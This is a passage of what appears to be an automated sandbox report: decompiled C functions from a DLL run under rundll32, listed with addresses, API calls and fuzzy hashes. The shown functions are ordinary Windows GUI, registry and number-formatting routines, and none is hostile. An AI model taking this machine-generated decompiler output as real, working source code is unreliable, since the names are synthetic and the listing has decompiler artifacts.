                                                                                                                                                                            				E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                                                                                                                                            				_t28 = _t33;
                                                                                                                                                                            				_t33 = E10010DEC(0, _t28, SendMessageA);
                                                                                                                                                                            				if(_t33 != 0) {
                                                                                                                                                                            					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                                                                                                                                            					E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                                                                                                                                            					_t18 = GetCapture();
                                                                                                                                                                            					if(_t18 != 0) {
                                                                                                                                                                            						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
                                                                                                                                                                            					}
                                                                                                                                                                            					return _t18;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_push(_t28);
                                                                                                                                                                            					_v20 = 0x10057298;
                                                                                                                                                                            					E10017C83( &_v20, 0x1002e2fc);
                                                                                                                                                                            					asm("int3");
                                                                                                                                                                            					_push(4);
                                                                                                                                                                            					E10017BC1(E10027DEC, 0, SendMessageA, _t33);
                                                                                                                                                                            					_t29 = E10013965(0x104);
                                                                                                                                                                            					_v32 = _t29;
                                                                                                                                                                            					_t24 = 0;
                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                            					if(_t29 != 0) {
                                                                                                                                                                            						_t24 = E1000CF71(_t29);
                                                                                                                                                                            					}
                                                                                                                                                                            					return E10017C60(_t24);
                                                                                                                                                                            				}
                                                                                                                                                                            			}












                                                                                                                                                                            0x1001170e
                                                                                                                                                                            0x1001170e
                                                                                                                                                                            0x10011710
                                                                                                                                                                            0x1001171d
                                                                                                                                                                            0x1001171f
                                                                                                                                                                            0x10011721
                                                                                                                                                                            0x10011723
                                                                                                                                                                            0x10011723
                                                                                                                                                                            0x10011729
                                                                                                                                                                            0x10011738
                                                                                                                                                                            0x10011745
                                                                                                                                                                            0x1001174a
                                                                                                                                                                            0x10011751
                                                                                                                                                                            0x10011755
                                                                                                                                                                            0x10011763
                                                                                                                                                                            0x10011770
                                                                                                                                                                            0x10011775
                                                                                                                                                                            0x1001177d
                                                                                                                                                                            0x10011784
                                                                                                                                                                            0x10011784
                                                                                                                                                                            0x10011789
                                                                                                                                                                            0x10011757
                                                                                                                                                                            0x1000a0de
                                                                                                                                                                            0x1000a0e8
                                                                                                                                                                            0x1000a0ef
                                                                                                                                                                            0x1000a0f4
                                                                                                                                                                            0x1000a0f5
                                                                                                                                                                            0x1000a0fc
                                                                                                                                                                            0x1000a10b
                                                                                                                                                                            0x1000a10d
                                                                                                                                                                            0x1000a110
                                                                                                                                                                            0x1000a114
                                                                                                                                                                            0x1000a117
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000a123

                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 10011738
                                                                                                                                                                            • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 10011763
                                                                                                                                                                              • Part of subcall function 1001044A: GetTopWindow.USER32(00000000), ref: 10010458
                                                                                                                                                                            • GetCapture.USER32 ref: 10011775
                                                                                                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 10011784
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CaptureWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 729421689-0
                                                                                                                                                                            • Opcode ID: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
                                                                                                                                                                            • Instruction ID: c1fa24ad5068faa30316ff7830c17e6e1fa791912a80157e4ea929c0746033bf
                                                                                                                                                                            • Opcode Fuzzy Hash: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
                                                                                                                                                                            • Instruction Fuzzy Hash: EF012CB5350219BFF621AB608CC9FBA36ADEB487C4F010539F685AA1E2C6A19C415660
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E10013F17(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v24;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                            				CHAR* _t21;
                                                                                                                                                                            				char* _t24;
                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                            				void* _t30;
                                                                                                                                                                            				signed int _t31;
                                                                                                                                                                            
                                                                                                                                                                            				_t28 = __edx;
                                                                                                                                                                            				_t13 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_v8 = _t13 ^ _t31;
                                                                                                                                                                            				_t24 = _a8;
                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                            				_t29 = _a4;
                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                                                                                                                                                                            					E10016DF0( &_v24, 0x10, "%d", _a12);
                                                                                                                                                                            					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t30 = E10013ED1(__ecx, _t29);
                                                                                                                                                                            					if(_t30 != 0) {
                                                                                                                                                                            						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
                                                                                                                                                                            						_t29 = _t21;
                                                                                                                                                                            						RegCloseKey(_t30);
                                                                                                                                                                            						_t18 = 0 | _t21 == 0x00000000;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
                                                                                                                                                                            			}














                                                                                                                                                                            0x10013f17
                                                                                                                                                                            0x10013f1d
                                                                                                                                                                            0x10013f24
                                                                                                                                                                            0x10013f28
                                                                                                                                                                            0x10013f2c
                                                                                                                                                                            0x10013f33
                                                                                                                                                                            0x10013f36
                                                                                                                                                                            0x10013f76
                                                                                                                                                                            0x10013f87
                                                                                                                                                                            0x10013f38
                                                                                                                                                                            0x10013f3e
                                                                                                                                                                            0x10013f42
                                                                                                                                                                            0x10013f50
                                                                                                                                                                            0x10013f57
                                                                                                                                                                            0x10013f59
                                                                                                                                                                            0x10013f63
                                                                                                                                                                            0x10013f63
                                                                                                                                                                            0x10013f42
                                                                                                                                                                            0x10013f9b

                                                                                                                                                                            APIs
                                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10013F50
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 10013F59
                                                                                                                                                                            • _swprintf.LIBCMT ref: 10013F76
                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10013F87
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4210924919-0
                                                                                                                                                                            • Opcode ID: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
                                                                                                                                                                            • Instruction ID: 30a1eb16c1be1d822a6ca59f9e75d62d608c78195c8382286e316af6553577e2
                                                                                                                                                                            • Opcode Fuzzy Hash: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
                                                                                                                                                                            • Instruction Fuzzy Hash: 25018076900219BBDB00DF648C85FAF77BCEF48754F104469FA01AB181DA74E94597A4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                            			E1000B244(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* _t16;
                                                                                                                                                                            				int _t17;
                                                                                                                                                                            				int _t18;
                                                                                                                                                                            				struct HWND__* _t19;
                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                            				void* _t35;
                                                                                                                                                                            
                                                                                                                                                                            				_t32 = __edi;
                                                                                                                                                                            				_t35 = __ecx;
                                                                                                                                                                            				_t25 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                            					__eflags =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						L3:
                                                                                                                                                                            						_t17 = E1000A0DB(0, _t25, _t32, _t35, _t39);
                                                                                                                                                                            						L4:
                                                                                                                                                                            						asm("sbb edx, edx");
                                                                                                                                                                            						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
                                                                                                                                                                            						L11:
                                                                                                                                                                            						 *((intOrPtr*)(_t35 + 0x18)) = 1;
                                                                                                                                                                            						return _t18;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _a4;
                                                                                                                                                                            					if(_a4 == 0) {
                                                                                                                                                                            						_push(__edi);
                                                                                                                                                                            						_t33 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                                                                            						_t19 = GetFocus();
                                                                                                                                                                            						__eflags = _t19 -  *(_t33 + 0x20);
                                                                                                                                                                            						if(_t19 ==  *(_t33 + 0x20)) {
                                                                                                                                                                            							SendMessageA( *(E1000FB5C(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_t18 = E10012913( *((intOrPtr*)(_t35 + 0x14)), _a4);
                                                                                                                                                                            					goto L11;
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
                                                                                                                                                                            					_t17 =  *(__ecx + 8);
                                                                                                                                                                            					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                                                                            					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                                                                                            						goto L4;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L3;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t16;
                                                                                                                                                                            			}












                                                                                                                                                                            0x1000b244
                                                                                                                                                                            0x1000b246
                                                                                                                                                                            0x1000b248
                                                                                                                                                                            0x1000b24f
                                                                                                                                                                            0x1000b284
                                                                                                                                                                            0x1000b287
                                                                                                                                                                            0x1000b25e
                                                                                                                                                                            0x1000b25e
                                                                                                                                                                            0x1000b263
                                                                                                                                                                            0x1000b269
                                                                                                                                                                            0x1000b27c
                                                                                                                                                                            0x1000b2c7
                                                                                                                                                                            0x1000b2c7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000b2c7
                                                                                                                                                                            0x1000b289
                                                                                                                                                                            0x1000b28d
                                                                                                                                                                            0x1000b28f
                                                                                                                                                                            0x1000b290
                                                                                                                                                                            0x1000b293
                                                                                                                                                                            0x1000b299
                                                                                                                                                                            0x1000b29c
                                                                                                                                                                            0x1000b2b4
                                                                                                                                                                            0x1000b2b4
                                                                                                                                                                            0x1000b2ba
                                                                                                                                                                            0x1000b2c2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000b2c2
                                                                                                                                                                            0x1000b254
                                                                                                                                                                            0x1000b256
                                                                                                                                                                            0x1000b259
                                                                                                                                                                            0x1000b25c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000b25c
                                                                                                                                                                            0x1000b2d0

                                                                                                                                                                            APIs
                                                                                                                                                                            • EnableMenuItem.USER32 ref: 1000B27C
                                                                                                                                                                              • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                                                                                              • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                                                                                            • GetFocus.USER32 ref: 1000B293
                                                                                                                                                                            • GetParent.USER32(?), ref: 1000B2A1
                                                                                                                                                                            • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 1000B2B4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3849708097-0
                                                                                                                                                                            • Opcode ID: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
                                                                                                                                                                            • Instruction ID: 6f1bf2e13571d4607552996c72993327e3919edcc1f96bcd7a145644f4ad6856
                                                                                                                                                                            • Opcode Fuzzy Hash: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
                                                                                                                                                                            • Instruction Fuzzy Hash: FB115B71500A11AFE720DF64CCC9D1EBBF6FF893A5B118A2DF186869A8C731AC45CB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                            			E1001044A(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                            				struct HWND__* _t18;
                                                                                                                                                                            				struct HWND__* _t20;
                                                                                                                                                                            				void* _t22;
                                                                                                                                                                            				void* _t23;
                                                                                                                                                                            				void* _t24;
                                                                                                                                                                            				struct HWND__* _t25;
                                                                                                                                                                            
                                                                                                                                                                            				_t23 = __ecx;
                                                                                                                                                                            				_t22 = __ebx;
                                                                                                                                                                            				_t24 = GetTopWindow;
                                                                                                                                                                            				_t16 = GetTopWindow(_a4);
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t25 = _t16;
                                                                                                                                                                            					if(_t25 == 0) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _a24;
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						SendMessageA(_t25, _a8, _a12, _a16);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t20 = E1000FB83(_t23, _t24, _t25, __eflags, _t25);
                                                                                                                                                                            						__eflags = _t20;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							_push(_a16);
                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                            							_push(_a8);
                                                                                                                                                                            							_push( *((intOrPtr*)(_t20 + 0x20)));
                                                                                                                                                                            							_push(_t20);
                                                                                                                                                                            							E1001016F(_t22, _t24, _t25, __eflags);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _a20;
                                                                                                                                                                            					if(_a20 != 0) {
                                                                                                                                                                            						_t18 = GetTopWindow(_t25);
                                                                                                                                                                            						__eflags = _t18;
                                                                                                                                                                            						if(_t18 != 0) {
                                                                                                                                                                            							E1001044A(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_t16 = GetWindow(_t25, 2);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t16;
                                                                                                                                                                            			}













                                                                                                                                                                            0x1001044a
                                                                                                                                                                            0x1001044a
                                                                                                                                                                            0x10010452
                                                                                                                                                                            0x10010458
                                                                                                                                                                            0x100104bb
                                                                                                                                                                            0x100104bb
                                                                                                                                                                            0x100104bf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001045c
                                                                                                                                                                            0x10010460
                                                                                                                                                                            0x1001048a
                                                                                                                                                                            0x10010462
                                                                                                                                                                            0x10010463
                                                                                                                                                                            0x10010468
                                                                                                                                                                            0x1001046a
                                                                                                                                                                            0x1001046c
                                                                                                                                                                            0x1001046f
                                                                                                                                                                            0x10010472
                                                                                                                                                                            0x10010475
                                                                                                                                                                            0x10010478
                                                                                                                                                                            0x10010479
                                                                                                                                                                            0x10010479
                                                                                                                                                                            0x1001046a
                                                                                                                                                                            0x10010490
                                                                                                                                                                            0x10010494
                                                                                                                                                                            0x10010497
                                                                                                                                                                            0x10010499
                                                                                                                                                                            0x1001049b
                                                                                                                                                                            0x100104ad
                                                                                                                                                                            0x100104ad
                                                                                                                                                                            0x1001049b
                                                                                                                                                                            0x100104b5
                                                                                                                                                                            0x100104b5
                                                                                                                                                                            0x100104c4

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 10010458
                                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 10010497
                                                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 100104B5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2353593579-0
                                                                                                                                                                            • Opcode ID: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
                                                                                                                                                                            • Instruction ID: cb0d0bbe13ee34529c330f041d0b53c98759dff42d13bab1c22f515cd31b8fc3
                                                                                                                                                                            • Opcode Fuzzy Hash: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
                                                                                                                                                                            • Instruction Fuzzy Hash: CD01257620061ABBDF12DF908C44E9F3A6AEF08390F018014FE8458060C7B6D9A2EBA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E100223DD(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                            				void* _t26;
                                                                                                                                                                            				void* _t28;
                                                                                                                                                                            				void* _t29;
                                                                                                                                                                            
                                                                                                                                                                            				_t28 = __ebx;
                                                                                                                                                                            				_t25 = _a16;
                                                                                                                                                                            				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                            					_t26 = E10021CDA(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t35 = _t25 - 0x66;
                                                                                                                                                                            					if(_t25 != 0x66) {
                                                                                                                                                                            						__eflags = _t25 - 0x61;
                                                                                                                                                                            						if(_t25 == 0x61) {
                                                                                                                                                                            							L7:
                                                                                                                                                                            							_t26 = E10021DC6(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                            						} else {
                                                                                                                                                                            							__eflags = _t25 - 0x41;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								goto L7;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t26 = E100222E5(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L9:
                                                                                                                                                                            						return _t26;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						return E1002222C(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}







                                                                                                                                                                            0x100223dd
                                                                                                                                                                            0x100223e0
                                                                                                                                                                            0x100223e6
                                                                                                                                                                            0x10022459
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100223ed
                                                                                                                                                                            0x100223ed
                                                                                                                                                                            0x100223f0
                                                                                                                                                                            0x1002240b
                                                                                                                                                                            0x1002240e
                                                                                                                                                                            0x1002242e
                                                                                                                                                                            0x10022440
                                                                                                                                                                            0x10022410
                                                                                                                                                                            0x10022410
                                                                                                                                                                            0x10022413
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10022415
                                                                                                                                                                            0x10022427
                                                                                                                                                                            0x10022427
                                                                                                                                                                            0x10022413
                                                                                                                                                                            0x1002245e
                                                                                                                                                                            0x10022462
                                                                                                                                                                            0x100223f2
                                                                                                                                                                            0x1002240a
                                                                                                                                                                            0x1002240a
                                                                                                                                                                            0x100223f0

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3016257755-0
                                                                                                                                                                            • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                                                            • Instruction ID: 8dbc0b72f00ea763734ae0c8b1a7260823f108f727578f4f2c9ad294c4834352
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                                                            • Instruction Fuzzy Hash: 4201287A40014ABBCF12AEC4EC41CEE3F66FB18294B958515FE1858531D236D9B2AB81
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E1000FE47(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                            				struct HWND__* _t10;
                                                                                                                                                                            				void* _t14;
                                                                                                                                                                            				void* _t15;
                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                            				struct HWND__* _t17;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            
                                                                                                                                                                            				_t14 = __ecx;
                                                                                                                                                                            				_t13 = __ebx;
                                                                                                                                                                            				_t9 = GetDlgItem(_a4, _a8);
                                                                                                                                                                            				_t15 = GetTopWindow;
                                                                                                                                                                            				_t16 = _t9;
                                                                                                                                                                            				if(_t16 == 0) {
                                                                                                                                                                            					L6:
                                                                                                                                                                            					_t10 = GetTopWindow(_a4);
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						_t17 = _t10;
                                                                                                                                                                            						__eflags = _t17;
                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                            							goto L10;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t10 = E1000FE47(_t13, _t14, _t17, _a8, _a12);
                                                                                                                                                                            						__eflags = _t10;
                                                                                                                                                                            						if(_t10 == 0) {
                                                                                                                                                                            							_t10 = GetWindow(_t17, 2);
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L10;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					if(GetTopWindow(_t16) == 0) {
                                                                                                                                                                            						L3:
                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                            						if(_a12 == 0) {
                                                                                                                                                                            							return E1000FB5C(_t13, _t14, _t18);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t10 = E1000FB83(_t14, _t15, _t16, __eflags);
                                                                                                                                                                            						__eflags = _t10;
                                                                                                                                                                            						if(_t10 == 0) {
                                                                                                                                                                            							goto L6;
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t10 = E1000FE47(__ebx, _t14, _t16, _a8, _a12);
                                                                                                                                                                            						if(_t10 == 0) {
                                                                                                                                                                            							goto L3;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				L10:
                                                                                                                                                                            				return _t10;
                                                                                                                                                                            			}













                                                                                                                                                                            0x1000fe47
                                                                                                                                                                            0x1000fe47
                                                                                                                                                                            0x1000fe52
                                                                                                                                                                            0x1000fe58
                                                                                                                                                                            0x1000fe5e
                                                                                                                                                                            0x1000fe62
                                                                                                                                                                            0x1000fe92
                                                                                                                                                                            0x1000fe95
                                                                                                                                                                            0x1000feb2
                                                                                                                                                                            0x1000feb2
                                                                                                                                                                            0x1000feb4
                                                                                                                                                                            0x1000feb6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000fea0
                                                                                                                                                                            0x1000fea5
                                                                                                                                                                            0x1000fea7
                                                                                                                                                                            0x1000feac
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000feac
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000fea7
                                                                                                                                                                            0x1000fe64
                                                                                                                                                                            0x1000fe69
                                                                                                                                                                            0x1000fe7b
                                                                                                                                                                            0x1000fe7f
                                                                                                                                                                            0x1000fe80
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000fe82
                                                                                                                                                                            0x1000fe89
                                                                                                                                                                            0x1000fe8e
                                                                                                                                                                            0x1000fe90
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000fe6b
                                                                                                                                                                            0x1000fe72
                                                                                                                                                                            0x1000fe79
